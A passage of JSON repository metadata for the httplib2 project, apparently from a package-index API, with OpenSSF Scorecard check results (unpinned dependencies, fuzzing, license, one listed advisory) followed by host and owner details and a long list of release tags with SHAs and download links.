GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/